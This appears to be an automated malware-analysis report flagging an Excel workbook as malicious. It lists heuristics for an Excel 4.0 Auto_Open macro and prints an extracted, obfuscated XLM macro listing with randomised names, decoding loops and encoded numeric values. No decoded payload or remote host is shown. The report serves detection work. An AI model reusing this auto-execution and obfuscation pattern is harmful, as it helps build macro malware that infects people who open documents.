MALICIOUS
Risk Score: 140

Heuristics: 3

- Excel 4.0 Auto_Open defined name (critical, OLE_XLM_AUTOOPEN_DEFINEDNAME): oletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
- XLM Auto_Open with dangerous formula APIs (critical, OLE_XLM_DANGEROUS_FN): Excel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
- Excel 4.0 (XLM) macro sheet present (medium, OLE_XLM_AUTOOPEN): Workbook contains an Excel 4.0 macro sheet sub-stream. XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
Extracted artifacts: 1
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| xlm_macros.txt | xlm-macro | oletools.olevba.extract_all_macros (XLM macro listing) | 6651 bytes |

SHA-256: b17301d59297484ad039ee65099ef2bb2d699ea9ecd7330582323d9395fd9438

Preview script (first 1,000 lines of the extracted script):
' 0085 14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - Sheet
' 0085 15 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible - sOkUMa
' 0018 23 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d Sheet!I154
' 0018 20 LABEL : Cell Value, String Constant - blHiW len=0
' 0018 24 LABEL : Cell Value, String Constant - fuYOkOIss len=0
' 0018 23 LABEL : Cell Value, String Constant - gtAIMDIF len=0
' 0018 22 LABEL : Cell Value, String Constant - iXBmnjT len=0
' 0018 20 LABEL : Cell Value, String Constant - IxrMJ len=0
' 0018 20 LABEL : Cell Value, String Constant - ltHig len=0
' 0018 25 LABEL : Cell Value, String Constant - lUfZYqByKa len=0
' 0018 21 LABEL : Cell Value, String Constant - OjHAok len=0
' 0018 21 LABEL : Cell Value, String Constant - oWCwZB len=0
' 0018 27 LABEL : Cell Value, String Constant - pEbCKMEFYSTz len=0
' 0018 20 LABEL : Cell Value, String Constant - qPXxs len=0
' 0018 27 LABEL : Cell Value, String Constant - RhWIsZnAgCAM len=0
' 0018 27 LABEL : Cell Value, String Constant - RpTzpNiweivC len=0
' 0018 20 LABEL : Cell Value, String Constant - sLdjs len=0
' 0018 24 LABEL : Cell Value, String Constant - TBxyisaDj len=0
' 0018 25 LABEL : Cell Value, String Constant - ubgLKmtFpk len=0
' 0018 23 LABEL : Cell Value, String Constant - ujqaKOvT len=0
' 0018 26 LABEL : Cell Value, String Constant - ulYNKiTJIFq len=0
' 0018 23 LABEL : Cell Value, String Constant - WAXdnUeM len=0
' 0018 27 LABEL : Cell Value, String Constant - wgDOcOslLLVQ len=0
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' Sheet,Reference,Formula,Value
' sOkUMa,I63,"SET.NAME("IxrMJ",0+VALUE("0"))",""
' sOkUMa,I68,"SET.NAME("OjHAok",IxrMJ)",""
' sOkUMa,I71,"SET.NAME("wgDOcOslLLVQ",IxrMJ)",""
' sOkUMa,I73,"SET.NAME("ujqaKOvT",COUNTA(pEbCKMEFYSTz))",""
' sOkUMa,I76,"SET.NAME("lUfZYqByKa",COUNTA(iXBmnjT))",""
' sOkUMa,Q76,"",522.00000000000000000000
' sOkUMa,Q77,"",-244.00000000000000000000
' sOkUMa,Q78,"",870.00000000000000000000
' sOkUMa,I79,[],""
' sOkUMa,Q79,"",693.00000000000000000000
' sOkUMa,Q80,"",837.00000000000000000000
' sOkUMa,Q81,"",-271.00000000000000000000
' sOkUMa,I84,"SET.NAME("WAXdnUeM","")",""
' sOkUMa,I87,"OjHAok",""
' sOkUMa,I91,"SET.NAME("ulYNKiTJIFq",HLOOKUP("*",pEbCKMEFYSTz,OjHAok,FALSE))",""
' sOkUMa,I96,"ltHig",""
' sOkUMa,I99,"SET.NAME("fuYOkOIss",IxrMJ)",""
' sOkUMa,I104,[],""
' sOkUMa,I106,"fuYOkOIss",""
' sOkUMa,I110,"oWCwZB",""
' sOkUMa,I112,"sLdjs",""
' sOkUMa,I114,"RpTzpNiweivC",""
' sOkUMa,I118,"SET.NAME("TBxyisaDj",VALUE(HLOOKUP("*",iXBmnjT,RpTzpNiweivC,FALSE)))",""
' sOkUMa,I122,"gtAIMDIF",""
' sOkUMa,I126,"WAXdnUeM",""
' sOkUMa,I129,"wgDOcOslLLVQ",""
' sOkUMa,I131,NEXT(),""
' sOkUMa,I134,"blHiW",""
' sOkUMa,I138,[],""
' sOkUMa,I141,"qPXxs",""
' sOkUMa,I144,NEXT(),""
' sOkUMa,I149,RETURN(),""
' sOkUMa,I183,"SET.NAME("ubgLKmtFpk",I63)",""
' sOkUMa,I186,"pEbCKMEFYSTz",""
' sOkUMa,I191,"SET.NAME("iXBmnjT",R89C15)",""
' sOkUMa,I196,"SET.NAME("qPXxs",202)",""
' sOkUMa,I198,"SET.NAME("RhWIsZnAgCAM",9)",""
' sOkUMa,I201,ubgLKmtFpk(),""
' sOkUMa,I202,HALT(),""